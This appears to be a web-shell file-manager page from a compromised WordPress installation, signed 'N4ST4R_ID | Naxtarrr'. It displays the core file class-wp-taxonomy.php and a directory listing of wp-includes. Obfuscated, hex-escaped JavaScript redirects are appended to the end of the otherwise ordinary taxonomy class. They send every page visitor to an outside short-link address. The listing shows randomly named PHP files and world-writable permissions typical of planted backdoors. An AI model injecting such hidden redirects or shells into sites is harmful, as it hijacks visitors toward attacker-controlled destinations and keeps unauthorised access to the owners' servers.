Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
adminterpercaya.pro
/
wp-includes
/
File Content:
class-wp-taxonomy.php
<?php /** * Taxonomy API: WP_Taxonomy class * * @package WordPress * @subpackage Taxonomy * @since 4.7.0 */ /** * Core class used for interacting with taxonomies. * * @since 4.7.0 */ #[AllowDynamicProperties] final class WP_Taxonomy { /** * Taxonomy key. * * @since 4.7.0 * @var string */ public $name; /** * Name of the taxonomy shown in the menu. Usually plural. * * @since 4.7.0 * @var string */ public $label; /** * Labels object for this taxonomy. * * If not set, tag labels are inherited for non-hierarchical types * and category labels for hierarchical ones. * * @see get_taxonomy_labels() * * @since 4.7.0 * @var stdClass */ public $labels; /** * Default labels. * * @since 6.0.0 * @var (string|null)[][] $default_labels */ protected static $default_labels = array(); /** * A short descriptive summary of what the taxonomy is for. * * @since 4.7.0 * @var string */ public $description = ''; /** * Whether a taxonomy is intended for use publicly either via the admin interface or by front-end users. * * @since 4.7.0 * @var bool */ public $public = true; /** * Whether the taxonomy is publicly queryable. * * @since 4.7.0 * @var bool */ public $publicly_queryable = true; /** * Whether the taxonomy is hierarchical. * * @since 4.7.0 * @var bool */ public $hierarchical = false; /** * Whether to generate and allow a UI for managing terms in this taxonomy in the admin. * * @since 4.7.0 * @var bool */ public $show_ui = true; /** * Whether to show the taxonomy in the admin menu. * * If true, the taxonomy is shown as a submenu of the object type menu. If false, no menu is shown. * * @since 4.7.0 * @var bool */ public $show_in_menu = true; /** * Whether the taxonomy is available for selection in navigation menus. * * @since 4.7.0 * @var bool */ public $show_in_nav_menus = true; /** * Whether to list the taxonomy in the tag cloud widget controls. * * @since 4.7.0 * @var bool */ public $show_tagcloud = true; /** * Whether to show the taxonomy in the quick/bulk edit panel. * * @since 4.7.0 * @var bool */ public $show_in_quick_edit = true; /** * Whether to display a column for the taxonomy on its post type listing screens. * * @since 4.7.0 * @var bool */ public $show_admin_column = false; /** * The callback function for the meta box display. * * @since 4.7.0 * @var bool|callable */ public $meta_box_cb = null; /** * The callback function for sanitizing taxonomy data saved from a meta box. * * @since 5.1.0 * @var callable */ public $meta_box_sanitize_cb = null; /** * An array of object types this taxonomy is registered for. * * @since 4.7.0 * @var string[] */ public $object_type = null; /** * Capabilities for this taxonomy. * * @since 4.7.0 * @var stdClass */ public $cap; /** * Rewrites information for this taxonomy. * * @since 4.7.0 * @var array|false */ public $rewrite; /** * Query var string for this taxonomy. * * @since 4.7.0 * @var string|false */ public $query_var; /** * Function that will be called when the count is updated. * * @since 4.7.0 * @var callable */ public $update_count_callback; /** * Whether this taxonomy should appear in the REST API. * * Default false. If true, standard endpoints will be registered with * respect to $rest_base and $rest_controller_class. * * @since 4.7.4 * @var bool $show_in_rest */ public $show_in_rest; /** * The base path for this taxonomy's REST API endpoints. * * @since 4.7.4 * @var string|bool $rest_base */ public $rest_base; /** * The namespace for this taxonomy's REST API endpoints. * * @since 5.9.0 * @var string|bool $rest_namespace */ public $rest_namespace; /** * The controller for this taxonomy's REST API endpoints. * * Custom controllers must extend WP_REST_Controller. * * @since 4.7.4 * @var string|bool $rest_controller_class */ public $rest_controller_class; /** * The controller instance for this taxonomy's REST API endpoints. * * Lazily computed. Should be accessed using {@see WP_Taxonomy::get_rest_controller()}. * * @since 5.5.0 * @var WP_REST_Controller $rest_controller */ public $rest_controller; /** * The default term name for this taxonomy. If you pass an array you have * to set 'name' and optionally 'slug' and 'description'. * * @since 5.5.0 * @var array|string */ public $default_term; /** * Whether terms in this taxonomy should be sorted in the order they are provided to `wp_set_object_terms()`. * * Use this in combination with `'orderby' => 'term_order'` when fetching terms. * * @since 2.5.0 * @var bool|null */ public $sort = null; /** * Array of arguments to automatically use inside `wp_get_object_terms()` for this taxonomy. * * @since 2.6.0 * @var array|null */ public $args = null; /** * Whether it is a built-in taxonomy. * * @since 4.7.0 * @var bool */ public $_builtin; /** * Constructor. * * See the register_taxonomy() function for accepted arguments for `$args`. * * @since 4.7.0 * * @param string $taxonomy Taxonomy key, must not exceed 32 characters. * @param array|string $object_type Name of the object type for the taxonomy object. * @param array|string $args Optional. Array or query string of arguments for registering a taxonomy. * See register_taxonomy() for information on accepted arguments. * Default empty array. */ public function __construct( $taxonomy, $object_type, $args = array() ) { $this->name = $taxonomy; $this->set_props( $object_type, $args ); } /** * Sets taxonomy properties. * * See the register_taxonomy() function for accepted arguments for `$args`. * * @since 4.7.0 * * @param string|string[] $object_type Name or array of names of the object types for the taxonomy. * @param array|string $args Array or query string of arguments for registering a taxonomy. */ public function set_props( $object_type, $args ) { $args = wp_parse_args( $args ); /** * Filters the arguments for registering a taxonomy. * * @since 4.4.0 * * @param array $args Array of arguments for registering a taxonomy. * See the register_taxonomy() function for accepted arguments. * @param string $taxonomy Taxonomy key. * @param string[] $object_type Array of names of object types for the taxonomy. */ $args = apply_filters( 'register_taxonomy_args', $args, $this->name, (array) $object_type ); $taxonomy = $this->name; /** * Filters the arguments for registering a specific taxonomy. * * The dynamic portion of the filter name, `$taxonomy`, refers to the taxonomy key. * * Possible hook names include: * * - `register_category_taxonomy_args` * - `register_post_tag_taxonomy_args` * * @since 6.0.0 * * @param array $args Array of arguments for registering a taxonomy. * See the register_taxonomy() function for accepted arguments. * @param string $taxonomy Taxonomy key. * @param string[] $object_type Array of names of object types for the taxonomy. */ $args = apply_filters( "register_{$taxonomy}_taxonomy_args", $args, $this->name, (array) $object_type ); $defaults = array( 'labels' => array(), 'description' => '', 'public' => true, 'publicly_queryable' => null, 'hierarchical' => false, 'show_ui' => null, 'show_in_menu' => null, 'show_in_nav_menus' => null, 'show_tagcloud' => null, 'show_in_quick_edit' => null, 'show_admin_column' => false, 'meta_box_cb' => null, 'meta_box_sanitize_cb' => null, 'capabilities' => array(), 'rewrite' => true, 'query_var' => $this->name, 'update_count_callback' => '', 'show_in_rest' => false, 'rest_base' => false, 'rest_namespace' => false, 'rest_controller_class' => false, 'default_term' => null, 'sort' => null, 'args' => null, '_builtin' => false, ); $args = array_merge( $defaults, $args ); // If not set, default to the setting for 'public'. if ( null === $args['publicly_queryable'] ) { $args['publicly_queryable'] = $args['public']; } if ( false !== $args['query_var'] && ( is_admin() || false !== $args['publicly_queryable'] ) ) { if ( true === $args['query_var'] ) { $args['query_var'] = $this->name; } else { $args['query_var'] = sanitize_title_with_dashes( $args['query_var'] ); } } else { // Force 'query_var' to false for non-public taxonomies. $args['query_var'] = false; } if ( false !== $args['rewrite'] && ( is_admin() || get_option( 'permalink_structure' ) ) ) { $args['rewrite'] = wp_parse_args( $args['rewrite'], array( 'with_front' => true, 'hierarchical' => false, 'ep_mask' => EP_NONE, ) ); if ( empty( $args['rewrite']['slug'] ) ) { $args['rewrite']['slug'] = sanitize_title_with_dashes( $this->name ); } } // If not set, default to the setting for 'public'. if ( null === $args['show_ui'] ) { $args['show_ui'] = $args['public']; } // If not set, default to the setting for 'show_ui'. if ( null === $args['show_in_menu'] || ! $args['show_ui'] ) { $args['show_in_menu'] = $args['show_ui']; } // If not set, default to the setting for 'public'. if ( null === $args['show_in_nav_menus'] ) { $args['show_in_nav_menus'] = $args['public']; } // If not set, default to the setting for 'show_ui'. if ( null === $args['show_tagcloud'] ) { $args['show_tagcloud'] = $args['show_ui']; } // If not set, default to the setting for 'show_ui'. if ( null === $args['show_in_quick_edit'] ) { $args['show_in_quick_edit'] = $args['show_ui']; } // If not set, default rest_namespace to wp/v2 if show_in_rest is true. if ( false === $args['rest_namespace'] && ! empty( $args['show_in_rest'] ) ) { $args['rest_namespace'] = 'wp/v2'; } $default_caps = array( 'manage_terms' => 'manage_categories', 'edit_terms' => 'manage_categories', 'delete_terms' => 'manage_categories', 'assign_terms' => 'edit_posts', ); $args['cap'] = (object) array_merge( $default_caps, $args['capabilities'] ); unset( $args['capabilities'] ); $args['object_type'] = array_unique( (array) $object_type ); // If not set, use the default meta box. if ( null === $args['meta_box_cb'] ) { if ( $args['hierarchical'] ) { $args['meta_box_cb'] = 'post_categories_meta_box'; } else { $args['meta_box_cb'] = 'post_tags_meta_box'; } } $args['name'] = $this->name; // Default meta box sanitization callback depends on the value of 'meta_box_cb'. if ( null === $args['meta_box_sanitize_cb'] ) { switch ( $args['meta_box_cb'] ) { case 'post_categories_meta_box': $args['meta_box_sanitize_cb'] = 'taxonomy_meta_box_sanitize_cb_checkboxes'; break; case 'post_tags_meta_box': default: $args['meta_box_sanitize_cb'] = 'taxonomy_meta_box_sanitize_cb_input'; break; } } // Default taxonomy term. if ( ! empty( $args['default_term'] ) ) { if ( ! is_array( $args['default_term'] ) ) { $args['default_term'] = array( 'name' => $args['default_term'] ); } $args['default_term'] = wp_parse_args( $args['default_term'], array( 'name' => '', 'slug' => '', 'description' => '', ) ); } foreach ( $args as $property_name => $property_value ) { $this->$property_name = $property_value; } $this->labels = get_taxonomy_labels( $this ); $this->label = $this->labels->name; } /** * Adds the necessary rewrite rules for the taxonomy. * * @since 4.7.0 * * @global WP $wp Current WordPress environment instance. */ public function add_rewrite_rules() { /* @var WP $wp */ global $wp; // Non-publicly queryable taxonomies should not register query vars, except in the admin. if ( false !== $this->query_var && $wp ) { $wp->add_query_var( $this->query_var ); } if ( false !== $this->rewrite && ( is_admin() || get_option( 'permalink_structure' ) ) ) { if ( $this->hierarchical && $this->rewrite['hierarchical'] ) { $tag = '(.+?)'; } else { $tag = '([^/]+)'; } add_rewrite_tag( "%$this->name%", $tag, $this->query_var ? "{$this->query_var}=" : "taxonomy=$this->name&term=" ); add_permastruct( $this->name, "{$this->rewrite['slug']}/%$this->name%", $this->rewrite ); } } /** * Removes any rewrite rules, permastructs, and rules for the taxonomy. * * @since 4.7.0 * * @global WP $wp Current WordPress environment instance. */ public function remove_rewrite_rules() { /* @var WP $wp */ global $wp; // Remove query var. if ( false !== $this->query_var ) { $wp->remove_query_var( $this->query_var ); } // Remove rewrite tags and permastructs. if ( false !== $this->rewrite ) { remove_rewrite_tag( "%$this->name%" ); remove_permastruct( $this->name ); } } /** * Registers the ajax callback for the meta box. * * @since 4.7.0 */ public function add_hooks() { add_filter( 'wp_ajax_add-' . $this->name, '_wp_ajax_add_hierarchical_term' ); } /** * Removes the ajax callback for the meta box. * * @since 4.7.0 */ public function remove_hooks() { remove_filter( 'wp_ajax_add-' . $this->name, '_wp_ajax_add_hierarchical_term' ); } /** * Gets the REST API controller for this taxonomy. * * Will only instantiate the controller class once per request. * * @since 5.5.0 * * @return WP_REST_Controller|null The controller instance, or null if the taxonomy * is set not to show in rest. */ public function get_rest_controller() { if ( ! $this->show_in_rest ) { return null; } $class = $this->rest_controller_class ? $this->rest_controller_class : WP_REST_Terms_Controller::class; if ( ! class_exists( $class ) ) { return null; } if ( ! is_subclass_of( $class, WP_REST_Controller::class ) ) { return null; } if ( ! $this->rest_controller ) { $this->rest_controller = new $class( $this->name ); } if ( ! ( $this->rest_controller instanceof $class ) ) { return null; } return $this->rest_controller; } /** * Returns the default labels for taxonomies. * * @since 6.0.0 * * @return (string|null)[][] The default labels for taxonomies. */ public static function get_default_labels() { if ( ! empty( self::$default_labels ) ) { return self::$default_labels; } $name_field_description = __( 'The name is how it appears on your site.' ); $slug_field_description = __( 'The “slug” is the URL-friendly version of the name. It is usually all lowercase and contains only letters, numbers, and hyphens.' ); $parent_field_description = __( 'Assign a parent term to create a hierarchy. The term Jazz, for example, would be the parent of Bebop and Big Band.' ); $desc_field_description = __( 'The description is not prominent by default; however, some themes may show it.' ); self::$default_labels = array( 'name' => array( _x( 'Tags', 'taxonomy general name' ), _x( 'Categories', 'taxonomy general name' ) ), 'singular_name' => array( _x( 'Tag', 'taxonomy singular name' ), _x( 'Category', 'taxonomy singular name' ) ), 'search_items' => array( __( 'Search Tags' ), __( 'Search Categories' ) ), 'popular_items' => array( __( 'Popular Tags' ), null ), 'all_items' => array( __( 'All Tags' ), __( 'All Categories' ) ), 'parent_item' => array( null, __( 'Parent Category' ) ), 'parent_item_colon' => array( null, __( 'Parent Category:' ) ), 'name_field_description' => array( $name_field_description, $name_field_description ), 'slug_field_description' => array( $slug_field_description, $slug_field_description ), 'parent_field_description' => array( null, $parent_field_description ), 'desc_field_description' => array( $desc_field_description, $desc_field_description ), 'edit_item' => array( __( 'Edit Tag' ), __( 'Edit Category' ) ), 'view_item' => array( __( 'View Tag' ), __( 'View Category' ) ), 'update_item' => array( __( 'Update Tag' ), __( 'Update Category' ) ), 'add_new_item' => array( __( 'Add New Tag' ), __( 'Add New Category' ) ), 'new_item_name' => array( __( 'New Tag Name' ), __( 'New Category Name' ) ), 'separate_items_with_commas' => array( __( 'Separate tags with commas' ), null ), 'add_or_remove_items' => array( __( 'Add or remove tags' ), null ), 'choose_from_most_used' => array( __( 'Choose from the most used tags' ), null ), 'not_found' => array( __( 'No tags found.' ), __( 'No categories found.' ) ), 'no_terms' => array( __( 'No tags' ), __( 'No categories' ) ), 'filter_by_item' => array( null, __( 'Filter by category' ) ), 'items_list_navigation' => array( __( 'Tags list navigation' ), __( 'Categories list navigation' ) ), 'items_list' => array( __( 'Tags list' ), __( 'Categories list' ) ), /* translators: Tab heading when selecting from the most used terms. */ 'most_used' => array( _x( 'Most Used', 'tags' ), _x( 'Most Used', 'categories' ) ), 'back_to_items' => array( __( '← Go to Tags' ), __( '← Go to Categories' ) ), 'item_link' => array( _x( 'Tag Link', 'navigation link block title' ), _x( 'Category Link', 'navigation link block title' ), ), 'item_link_description' => array( _x( 'A link to a tag.', 'navigation link block description' ), _x( 'A link to a category.', 'navigation link block description' ), ), ); return self::$default_labels; } /** * Resets the cache for the default labels. * * @since 6.0.0 */ public static function reset_default_labels() { self::$default_labels = array(); } } ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script>
Submit
FILE
FOLDER
Name
Size
Permission
Action
ID3
---
0777
IXR
---
0777
PHPMailer
---
0777
Requests
---
0777
SimplePie
---
0777
Text
---
0777
assets
---
0777
block-bindings
---
0777
block-patterns
---
0777
block-supports
---
0777
blocks
---
0777
certificates
---
0777
css
---
0777
customize
---
0777
fonts
---
0777
html-api
---
0777
images
---
0777
interactivity-api
---
0777
js
---
0555
l10n
---
0777
php-compat
---
0777
pomo
---
0777
rest-api
---
0777
sitemaps
---
0777
sodium_compat
---
0777
style-engine
---
0777
theme-compat
---
0777
widgets
---
0777
.admi
2324 bytes
0644
.htaccess
0 bytes
0644
4XIvHEy8USr.php
52991 bytes
0644
6MenU3vkQjy.php
29033 bytes
0644
UPLBGF36ujb.php
29033 bytes
0644
Yw6vblZQUm7.php
52991 bytes
0644
admin-bar.php
38458 bytes
0644
admin.php
5362 bytes
0644
api_405645f5.php
24955 bytes
0644
atomlib.php
13436 bytes
0644
author-template.php
20309 bytes
0644
block-bindings.php
6952 bytes
0644
block-editor.php
29698 bytes
0644
block-i18n.json
316 bytes
0777
block-patterns.php
14477 bytes
0644
block-template-utils.php
61503 bytes
0644
block-template.php
15500 bytes
0644
blocks.php
106247 bytes
0644
bookmark-template.php
14306 bytes
0644
bookmark.php
16785 bytes
0644
cache-compat.php
7327 bytes
0644
cache.php
14832 bytes
0644
cache_2e94d37d.php
38609 bytes
0644
cache_6dc7ade8.php
223027 bytes
0644
canonical.php
35881 bytes
0644
capabilities.php
44076 bytes
0644
category-template.php
58361 bytes
0644
category.php
14067 bytes
0644
cjrcbvtk.php
760 bytes
0644
class-IXR.php
3902 bytes
0644
class-avif-info.php
30973 bytes
0644
class-feed.php
539 bytes
0777
class-http.php
367 bytes
0777
class-json.php
43684 bytes
0777
class-oembed.php
401 bytes
0777
class-phpass.php
8129 bytes
0644
class-phpmailer.php
664 bytes
0777
class-pop3.php
22532 bytes
0644
class-requests.php
3595 bytes
0644
class-simplepie.php
1811 bytes
0644
class-smtp.php
457 bytes
0777
class-snoopy.php
37715 bytes
0777
class-walker-category-dropdown.php
3827 bytes
0644
class-walker-category.php
9835 bytes
0644
class-walker-comment.php
15579 bytes
0644
class-walker-nav-menu.php
13142 bytes
0644
class-walker-page-dropdown.php
4068 bytes
0644
class-walker-page.php
8970 bytes
0644
class-wp-admin-bar.php
19232 bytes
0644
class-wp-ajax-response.php
6624 bytes
0644
class-wp-application-passwords.php
16975 bytes
0644
class-wp-block-bindings-registry.php
9821 bytes
0644
class-wp-block-bindings-source.php
4350 bytes
0644
class-wp-block-editor-context.php
2708 bytes
0644
class-wp-block-list.php
6115 bytes
0644
class-wp-block-metadata-registry.php
11585 bytes
0644
class-wp-block-parser-block.php
3913 bytes
0644
class-wp-block-parser-frame.php
3375 bytes
0644
class-wp-block-parser.php
12890 bytes
0644
class-wp-block-pattern-categories-registry.php
6729 bytes
0644
class-wp-block-patterns-registry.php
12141 bytes
0644
class-wp-block-styles-registry.php
7620 bytes
0644
class-wp-block-supports.php
6970 bytes
0644
class-wp-block-template.php
3391 bytes
0644
class-wp-block-templates-registry.php
8589 bytes
0644
class-wp-block-type-registry.php
6371 bytes
0644
class-wp-block-type.php
18623 bytes
0644
class-wp-block.php
21796 bytes
0644
class-wp-classic-to-block-menu-converter.php
5446 bytes
0644
class-wp-comment-query.php
49753 bytes
0644
class-wp-comment.php
10730 bytes
0644
class-wp-customize-control.php
27088 bytes
0644
class-wp-customize-manager.php
203897 bytes
0644
class-wp-customize-nav-menus.php
58543 bytes
0644
class-wp-customize-panel.php
11995 bytes
0644
class-wp-customize-section.php
12567 bytes
0644
class-wp-customize-setting.php
31247 bytes
0644
class-wp-customize-widgets.php
73515 bytes
0644
class-wp-date-query.php
37084 bytes
0644
class-wp-dependencies.php
16497 bytes
0644
class-wp-dependency.php
3985 bytes
0644
class-wp-duotone.php
42141 bytes
0644
class-wp-editor.php
73693 bytes
0644
class-wp-embed.php
17352 bytes
0644
class-wp-error.php
8860 bytes
0644
class-wp-exception.php
1611 bytes
0644
class-wp-fatal-error-handler.php
9508 bytes
0644
class-wp-feed-cache-transient.php
4534 bytes
0644
class-wp-feed-cache.php
969 bytes
0777
class-wp-hook.php
17358 bytes
0644
class-wp-http-cookie.php
8747 bytes
0644
class-wp-http-curl.php
13899 bytes
0644
class-wp-http-encoding.php
8047 bytes
0644
class-wp-http-ixr-client.php
4859 bytes
0644
class-wp-http-proxy.php
7338 bytes
0644
class-wp-http-requests-hooks.php
3380 bytes
0644
class-wp-http-requests-response.php
5758 bytes
0644
class-wp-http-response.php
4335 bytes
0644
class-wp-http-streams.php
16859 bytes
0777
class-wp-http.php
42864 bytes
0644
class-wp-image-editor-gd.php
21244 bytes
0644
class-wp-image-editor-imagick.php
34026 bytes
0644
class-wp-image-editor.php
18296 bytes
0644
class-wp-list-util.php
8801 bytes
0644
class-wp-locale-switcher.php
7988 bytes
0644
class-wp-locale.php
17469 bytes
0644
class-wp-matchesmapregex.php
3186 bytes
0644
class-wp-meta-query.php
31889 bytes
0644
class-wp-metadata-lazyloader.php
8191 bytes
0644
class-wp-navigation-fallback.php
10569 bytes
0644
class-wp-network-query.php
21215 bytes
0644
class-wp-network.php
13654 bytes
0644
class-wp-object-cache.php
18882 bytes
0644
class-wp-oembed-controller.php
8263 bytes
0644
class-wp-oembed.php
32833 bytes
0644
class-wp-paused-extensions-storage.php
6469 bytes
0644
class-wp-plugin-dependencies.php
26677 bytes
0644
class-wp-post-type.php
31698 bytes
0644
class-wp-post.php
7842 bytes
0644
class-wp-query.php
155439 bytes
0644
class-wp-recovery-mode-cookie-service.php
8235 bytes
0644
class-wp-recovery-mode-email-service.php
12541 bytes
0644
class-wp-recovery-mode-key-service.php
5966 bytes
0644
class-wp-recovery-mode-link-service.php
4821 bytes
0644
class-wp-recovery-mode.php
12793 bytes
0644
class-wp-rewrite.php
65046 bytes
0644
class-wp-role.php
3881 bytes
0644
class-wp-roles.php
9944 bytes
0644
class-wp-script-modules.php
20724 bytes
0644
class-wp-scripts.php
29702 bytes
0644
class-wp-session-tokens.php
8809 bytes
0644
class-wp-simplepie-file.php
4766 bytes
0644
class-wp-simplepie-sanitize-kses.php
3195 bytes
0644
class-wp-site-query.php
32983 bytes
0644
class-wp-site.php
8812 bytes
0644
class-wp-styles.php
12368 bytes
0644
class-wp-tax-query.php
20913 bytes
0644
class-wp-taxonomy.php
19925 bytes
0644
class-wp-term-query.php
42227 bytes
0644
class-wp-term.php
6656 bytes
0644
class-wp-text-diff-renderer-inline.php
2337 bytes
0644
class-wp-text-diff-renderer-table.php
20165 bytes
0644
class-wp-textdomain-registry.php
11839 bytes
0644
class-wp-theme-json-data.php
3167 bytes
0644
class-wp-theme-json-resolver.php
37163 bytes
0644
class-wp-theme-json-schema.php
8725 bytes
0644
class-wp-theme-json.php
162138 bytes
0644
class-wp-theme.php
66771 bytes
0644
class-wp-token-map.php
29976 bytes
0644
class-wp-user-meta-session-tokens.php
4348 bytes
0644
class-wp-user-query.php
45012 bytes
0644
class-wp-user-request.php
3580 bytes
0644
class-wp-user.php
24185 bytes
0644
class-wp-walker.php
14680 bytes
0644
class-wp-widget-factory.php
4705 bytes
0644
class-wp-widget.php
19782 bytes
0644
class-wp-xmlrpc-server.php
216306 bytes
0644
class-wp.php
27477 bytes
0644
class-wpdb.php
118389 bytes
0777
class.wp-dependencies.php
373 bytes
0777
class.wp-scripts.php
343 bytes
0777
class.wp-styles.php
338 bytes
0777
comment-template.php
104131 bytes
0644
comment.php
131633 bytes
0644
compat.php
18332 bytes
0644
cron.php
42952 bytes
0644
data_ca2e2215.php
170061 bytes
0644
date.php
400 bytes
0777
default-constants.php
12723 bytes
0644
default-filters.php
37043 bytes
0644
default-widgets.php
3580 bytes
0644
deprecated.php
191488 bytes
0644
dzbrzlel.php
760 bytes
0644
embed-template.php
338 bytes
0777
embed.php
39266 bytes
0644
error-protection.php
5479 bytes
0644
error_log
885 bytes
0644
feed-atom-comments.php
6847 bytes
0644
feed-atom.php
4391 bytes
0644
feed-rdf.php
4011 bytes
0644
feed-rss.php
2532 bytes
0644
feed-rss2-comments.php
5479 bytes
0644
feed-rss2.php
5142 bytes
0644
feed.php
24769 bytes
0644
fonts.php
11109 bytes
0644
formatting.php
336587 bytes
0644
functions.php
284521 bytes
0644
functions.wp-scripts.php
15916 bytes
0644
functions.wp-styles.php
9941 bytes
0644
gNZUScMukoQ.php
52991 bytes
0644
general-template.php
170850 bytes
0644
global-styles-and-settings.php
22563 bytes
0644
http.php
26670 bytes
0644
https-detection.php
7019 bytes
0644
https-migration.php
6099 bytes
0644
image_7d27b985.php
170062 bytes
0644
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
kses.php
75761 bytes
0644
l10n.php
69773 bytes
0644
link-template.php
157710 bytes
0777
load.php
55658 bytes
0644
locale.php
162 bytes
0777
lthcdd.php
8720 bytes
0644
media-template.php
64401 bytes
0644
media.php
219782 bytes
0644
meta.php
65767 bytes
0644
ms-blogs.php
27130 bytes
0644
ms-default-constants.php
6279 bytes
0644
ms-default-filters.php
7994 bytes
0644
ms-deprecated.php
23117 bytes
0644
ms-files.php
4069 bytes
0644
ms-functions.php
92607 bytes
0644
ms-load.php
21241 bytes
0644
ms-network.php
5140 bytes
0644
ms-settings.php
5482 bytes
0644
ms-site.php
41848 bytes
0644
nav-menu-template.php
27275 bytes
0644
nav-menu.php
45731 bytes
0644
option.php
103117 bytes
0644
php.ini
105 bytes
0644
pluggable-deprecated.php
7621 bytes
0644
pluggable.php
117328 bytes
0644
plugin.php
35465 bytes
0777
post-formats.php
8460 bytes
0644
post-template.php
68238 bytes
0644
post-thumbnail-template.php
12184 bytes
0644
post.php
291252 bytes
0644
query.php
38393 bytes
0644
registration-functions.php
200 bytes
0777
registration.php
200 bytes
0777
rest-api.php
100951 bytes
0644
revision.php
32248 bytes
0644
rewrite.php
20899 bytes
0644
robots-template.php
6543 bytes
0644
rss-functions.php
255 bytes
0777
rss.php
23113 bytes
0777
script-loader.php
132093 bytes
0644
script-modules.php
9070 bytes
0644
session.php
258 bytes
0777
shortcodes.php
25409 bytes
0644
si5ABYvuOU6.php
29033 bytes
0644
sitemaps.php
4596 bytes
0644
spl-autoload-compat.php
441 bytes
0777
style-engine.php
8921 bytes
0644
taxonomy.php
176796 bytes
0644
template-canvas.php
1887 bytes
0644
template-loader.php
4370 bytes
0644
template.php
25512 bytes
0644
theme-i18n.json
1292 bytes
0777
theme-previews.php
4190 bytes
0644
theme-templates.php
7581 bytes
0644
theme.json
8704 bytes
0777
theme.php
135343 bytes
0644
tmp_06220825.php
72477 bytes
0644
txets.php
5298 bytes
0444
update.php
38146 bytes
0644
user.php
175768 bytes
0644
vars.php
7847 bytes
0644
version.php
2289 bytes
0644
widgets.php
72040 bytes
0644
wp-blog-header.php
2796 bytes
0644
wp-cron.php
2796 bytes
0644
wp-db.php
445 bytes
0777
wp-diff.php
2084 bytes
0644
N4ST4R_ID | Naxtarrr